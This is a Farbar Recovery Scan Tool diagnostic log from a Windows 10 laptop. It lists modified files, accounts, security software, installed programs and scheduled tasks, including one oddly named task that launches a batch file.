2016-02-09 13:01 - 2016-01-26 22:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll
2016-02-09 13:01 - 2016-01-26 22:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-09 13:01 - 2016-01-26 22:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-09 13:01 - 2016-01-26 22:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll
2016-02-09 13:01 - 2016-01-26 22:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-02-09 13:01 - 2016-01-26 22:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-02-09 13:01 - 2016-01-26 22:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 20:34 - 2014-07-07 11:34 - 00000918 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-09 20:33 - 2013-12-13 19:44 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\AuthenTec
2016-03-09 20:32 - 2015-09-01 10:45 - 00000000 __SHD C:\Users\levilaing\IntelGraphicsProfiles
2016-03-09 20:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 19:44 - 2013-09-13 15:32 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 19:39 - 2016-01-06 10:04 - 00000000 ____D C:\WINDOWS\System32\Tasks\Norton Security
2016-03-09 19:31 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 19:30 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-09 19:30 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 19:28 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 19:25 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 18:52 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 18:20 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 18:16 - 2013-09-16 08:59 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-09 18:15 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by levilaing (2016-03-09 20:37:17)
Running from C:\Users\levilaing\Desktop
Windows 10 Home Version 1511 (X64) (2015-12-20 01:54:43)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1018505005-2824899964-3694806622-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1018505005-2824899964-3694806622-503 - Limited - Disabled)
Guest (S-1-5-21-1018505005-2824899964-3694806622-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1018505005-2824899964-3694806622-1005 - Limited - Enabled)
levilaing (S-1-5-21-1018505005-2824899964-3694806622-1001 - Administrator - Enabled) => C:\Users\levilaing

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.5.146 - Adobe Systems, Inc.)
AuthenTec TrueAPI 64-bit (Version: 1.6.0.87 - AuthenTec, Inc.) Hidden
BioExcess (Version: 6.5.5.20 - Egis Technology Inc.) Hidden
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.0.0 - Canon Inc.)
Canon MG2500 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG2500_series) (Version: 1.00 - Canon Inc.)
Canon MG2500 series On-screen Manual (HKLM-x32\...\Canon MG2500 series On-screen Manual) (Version: 7.6.1 - Canon Inc.)
Canon MG2500 series User Registration (HKLM-x32\...\Canon MG2500 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.2.1 - Canon Inc.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.3.2527 - CyberLink Corp.)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.3.2606 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dashlane (HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Dashlane) (Version: 4.1.0.99957 - Dashlane SAS)
DVD Flick 1.3.0.7 (HKLM-x32\...\DVD Flick_is1) (Version: 1.3.0.7 - Dennis Meuwissen)
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Fitbit Connect (HKLM-x32\...\{E54705FB-98A6-4C03-B2DC-D8C3B5486DCD}) (Version: 2.0.0.6512 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP 3D DriveGuard (HKLM\...\{54CE68A8-4F2D-4328-B1F7-D6C720405F7F}) (Version: 4.2.9.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{59F8C5AA-91BD-423D-BF05-09A80F39898F}) (Version: 2.10.62 - Hewlett-Packard Company)
HP Quick Launch (HKLM-x32\...\{E5823036-6F09-4D0A-B05C-E2BAA129288A}) (Version: 3.0.6 - Hewlett-Packard Company)
HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version:  - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {20FA2EF3-2447-4E52-8307-A684ED67C840} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {A5169291-4386-4125-8918-37E485684151} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\PROGRA~1\PHRASE~1\Aluts.bat
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-06-07 05:16 - 2013-06-07 05:16 - 04073768 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 06:11 - 2016-02-29 09:24 - 00227712 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
2016-01-13 06:11 - 2016-02-29 09:24 - 00285568 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-02 11:28 - 2016-03-02 11:28 - 01506304 _____ () C:\Program Files\WindowsApps\Microsoft.People_10.0.10500.0_x64__8wekyb3d8bbwe\People.BackgroundTasks.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
